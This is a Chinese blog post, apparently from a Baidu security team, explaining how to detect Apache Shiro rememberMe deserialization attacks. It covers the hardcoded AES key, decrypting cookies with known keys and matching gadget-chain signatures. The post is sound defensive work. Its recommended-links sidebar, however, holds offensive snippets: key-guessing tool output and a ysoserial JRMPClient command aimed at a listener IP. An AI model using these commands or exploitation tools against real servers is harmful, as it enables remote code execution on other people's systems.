shiro反序列化检测工具_Shiro rememberMe反序列化攻击检测思路

最新推荐文章于 2023-08-10 17:35:31 发布
最新推荐文章于 2023-08-10 17:35:31 发布
阅读量3.6k 收藏 1
点赞数
文章标签: shiro反序列化检测工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39646658/article/details/111582732
版权

1、背景

Apache Shiro是一款强大且易用的Java安全框架,使用范围非常广泛。Shiro默认使用CookieRememberMeManager,其处理cookie的流程是:rememberMe cookie值–>Base64解码–>AES解密–>反序列化。在Shiro<=1.2.4版本下,AES密钥是硬编码的,导致攻击者可以构造加密的反序列化数据执行任意命令。

下载Shiro 1.2.4的代码,先看看CookieRememberMeManager.java文件,发现其继承AbstractRememberMeManager类。

0f7bb4c7435abdce54821272a923023e.png

跟进到AbstractRememberMeManager类,在80行发现定了私有常量DEFAULT_CIPHER _KEY_BYTES,值为Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="),而这就是我们需要找的硬编码AES key。

6b1c11429345de1c409be175dbb06988.png

解密后的数据会经过AbstractRememberMeManager类的getRememberedPrincipals方法处理,并在该方法中调用了convertBytesToPrincipals方法.

c98b22b62e9e6c585bfd9898bedd751a.png

继续向上追踪,最后到DefaultSerializer类的deserialize方法调用了readObject,对解密的数据进行反序列化。

cd9721c4162ddc653e5fb69ea195589c.png

由于该漏洞攻击特征被加密,和正常数据看起来相似,在护网等场景下被攻击者大量使用,并且较难在不影响正常业务情况下直接做拦截。特别是对云上安全产品,客户的服务器、应用、业务种类繁多,直接封禁rememberMe cookie难以实现,因此需要先行对数据进行处理再做决定。

2、检测思路

我们需要模拟Shiro对Cookie处理的过程,对加密数据进行处理后再进行,处理过程的流程图如下:

22eee056aefd209d0ff6291fa80fe9ca.png

提取含有rememberMe cookie的值,对其做base64解码,再利用AES key对数据进行解密,由于该漏洞是AES key硬编码导致的,我们收集了市面上攻击者常用的20个AES key,覆盖绝大部分Shiro反序列化攻击行为。

498cdedc31150e9991e0c30ef17ea2c4.png

对数据解密后,先判断解密后数据是否以” aced0005”开头,即拥有Java序列化数据的特征。但是到了这步,仍然没办法确认是否是攻击,正常用户的rememberMe值解密后也是序列化的数据。但这里我们很清楚,此处存在漏洞是因此对数据做了反序列化操作即存在反序列化入口,而实际触发漏洞还需要有一个完整的利用链条。因此,我们提取了常见工具的20余条利用链的特征,再对解密数据进行判断,从而能正确的处理攻击数据。

3、检测效果

3.1攻击详情

3630a29dc8effd164dd50879f70eadf3.png

3.2 最近一周攻击趋势

f26840b906754b3c8c2a2da9e67a571f.png

4、一体化解决方案

百度安全智能一体化解决方案中已支持上述漏洞检测,并且开放了智能化编排的入口,用户只需要编写简单的脚本,就能够对特定数据进行处理,进行触发告警、拦截等措施。智能一体化解决方案如下:

bed9048ff4e4c90e3fa4586637be9373.png

对于此类无明显攻击特征的行为,WAF等设备通常无法直接拦截,智能网关先将旁路流量给到智能分析中心,通过用户添加的智能编排脚本处理,再将结果反馈到智能网关,对相应的攻击进行拦截,能够准确、有效地保护用户的资产。

另外,智能分析中心还集成了智能API识别,能够有效地对API进行分类识别,帮助用户梳理API资产;同时还集成了AI白模型等能力,当用户对资产进行一段时间的学习后,能够有效地防御未知攻击、0day攻击等。

5afc063ed5bd81edbee60e9b804bba64.png
weixin_39646658
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Shiro反序列化漏洞综合利用工具Shiro Attack使用教程
SHELLCODE_8BIT的博客
10-16 2261
将目标网站输入在目标地址栏中吗,点击爆破密钥,如果发现key,则可以利用
shiro反序列化漏洞检测工具,含链接教程
08-17
[admin@ shiro]java - shiro_tool.jar https://xx.xx.xx.xx/ [-] target: https://xx.xx.xx.xx/ [-] target is use shiro [-] start guess shiro key. [-] shiro key: kPH+bIxk5D2deZiIxcaaaA== [-] check URLDNS [*] find: URLDNS can be use [-] check CommonsBeanutils1 [*] find: CommonsBeanutils1 can be use [-] check CommonsCollections1 [-] check CommonsCollections2 [-] check CommonsCollections3 [-] check CommonsCollections4 [-] check CommonsCollections5 [-] check CommonsCollections6 [-] check Commons
shiro反序列化
weixin_48776804的博客
05-12 1万+
shiro反序列化
[Java反序列化]—Shiro反序列化(二)
snowlyzz的博客
12-06 516
shiro RCE利用
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
shiro反序列化漏洞学习(工具+原理+复现)
qq_49849300的博客
03-10 1万+
由于shiro反序列化需要用到AES加密,而该加密方法的密钥是加解密一致的,所以我们使用shiro反序列化时,AES加密的密钥必须跟服务器一致,所以经常需要盲猜服务器的密钥,好在java开发们一般都不会去修改它,而且常常直接copy论坛和github上的代码,所以可以大量收集各种密钥,然后遍历来完成反序列化漏洞利用。反过来,把字节序列(json/xml)恢复为Java对象的过程就叫反序列化。"方法,Base64.decode()中的字符串就是shiro的密钥,要确保该密钥的安全性,千万不要使用公开的密钥。
shiroshiro反序列化漏洞综合利用工具v2.2(下载、安装、使用)
热门推荐
Fighting_hawk的博客
07-01 2万+
本文主要介绍shiro反序列化漏洞综合利用工具的安装过程。
Shiro反序列化工具——ShiroAttack2
qq_44029310的博客
09-24 7329
shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题。作者为SummerSec。
shiro反序列化利用工具-ShiroAttack2(一)
siu~
08-10 393
shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具Shiro-550)
03-18
Shiro反序列化检测工具 ShiroScan用于检测存在四郎反序列化漏洞的关键值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测...
Shiro反序列化漏洞,Shiro版本升级资源
06-22
shiro版本时,其参数remeberMe存在硬编码,它对于cookie的处理流程是,首先获取rememberMe的cookie值,然后进行Base64解码,再进行AES解密,最后反序列化。但在这个过程中,其AES的Key硬编码,导致反序列化漏洞的...
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550)commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT...
shiro反序列化漏洞利用工具
11-09
Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴...
Shiro-EXP:Apache Shiro 反序列化漏洞检测利用工具,一键注入内存马
05-26
Shiro exp使用手册Shiro rememberMe反序列化漏洞漏洞原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie,服务端对rememberMe的cookie值先base64解码然后AES解密...
大学生创新创业训练计划经验分享.zip
04-25
大学生创新创业训练计划(以下简称为“大创计划”)是一项旨在提升大学生创新能力和创业精神的实践活动。通过这项计划,学生可以在导师的指导下,自主开展研究性学习和创业实践。下面我将分享一些关于大创计划的经验和建议。
node-v12.22.3-x86.msi
最新发布
04-25
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
毕业设计-The coding solutions of Leetcode and 剑指Offer using .zip
04-25
这里为你收集整理了关于毕业设计、课程设计可参考借鉴的资料一份,质量非常高,如果你投入时间去研究几天相信肯定对你有很大的帮助。到时候你会回来感谢我的。 本资源是经过本地编译测试、可打开、可运行的项目、文件或源码,可以用于毕业设计、课程设计的应用、参考和学习需求,请放心下载。 祝愿你在这个毕业设计项目中取得巨大进步,顺利毕业! 但还需强调一下,这些项目源码仅供学习和研究之用。在使用这些资源时,请务必遵守学术诚信原则和相关法律法规,不得将其用于任何商业目的或侵犯他人权益的行为。对于任何因使用本资源而导致的问题,包括但不限于数据丢失、系统崩溃或安全漏洞,风险自担哦!
shiro反序列化检测工具
07-29
\[1\]根据博文中的描述,shiro版本存在反序列化漏洞,其产生的原因是参数rememberMe存在硬编码,导致AES的Key也是硬编码,从而使得反序列化漏洞产生。\[2\]而升级到1.2.6版本后,通过使用ShiroExploit工具进行检测,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值